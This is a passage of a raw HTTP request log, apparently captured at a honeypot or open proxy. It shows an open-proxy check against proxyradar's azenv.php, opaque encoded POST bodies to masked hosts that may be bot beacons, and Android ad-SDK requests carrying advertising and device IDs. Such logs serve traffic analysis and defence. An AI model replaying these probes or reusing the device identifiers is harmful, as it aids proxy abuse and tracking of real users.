<soapenv:Body/></soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

U1PjmiERB+aFcbgO3iHb8hr3KvCmAYC983W59F8zoRM6xEKa0riJFTO2htSdDp/6VN+HVfEvREsEOEmkg+pegWxEJP6gwl+KZfEnAOxh0CdOB2C0NybqTaDKIzIsN4ZZfXso6Z7dYJZjuANYZh94caeqMGZ+bfwqGMNVEElwLtKjwFoOyCLrrPJZm3ESeblGcxKkWtrIAp57XQbsQTpLx91SLTh/KvTVsdCqe40c5yTcOEgHZRDzD9fIr7EACYZah7O5pZR/A3fG8ahveUKH/C9SAlcnNDWPAEPMr+lOH2lRYCMRa8Kp/B69PravgEN/bARYnjh9+E7J1e6zOV+wU8d96gOVHLntHOgbiekut8FNtrS9Fn79YnxhLccn7pnXnbg=

POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 483

{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","userAgent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 4LTE Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36","networkOperator":"TELKOMSEL","volume":0.4,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

BV2zyidEA1BHFAWVsa9ZZ05haFdfsHWPlefRjCHVMuhkBxNlEXptBgo0vi7vGswPBo29Xa3kb+FMvYpuqE5NaVRA02oP9AymSupZekpdOdrobZnwUClUwCwEj3RDaNkPqfg+HlGtYRH9iqoqqt6g56DptDohALe+r9q+dld/tG6YvEsZ4uAly7f0Mfr4xaKxcuHjqXZN7Ay855IkIoyqUE0FK2clOgSf+vWaHIqHbQboCgz68f7FNou8A2hI0OJFTtZ6PV9LSGbn9rcdpVvBPoLjY0zNv2AqnTT2v41NjImD30KlRhjQMuIVH5lzszcll/ktxSeHdktzmmVqe7jyaeovfu04VSKxHkfVRCgp9W9DBjl4l1wmMLLC

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://check.proxyradar.com/azenv.php?auth=149602520935&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded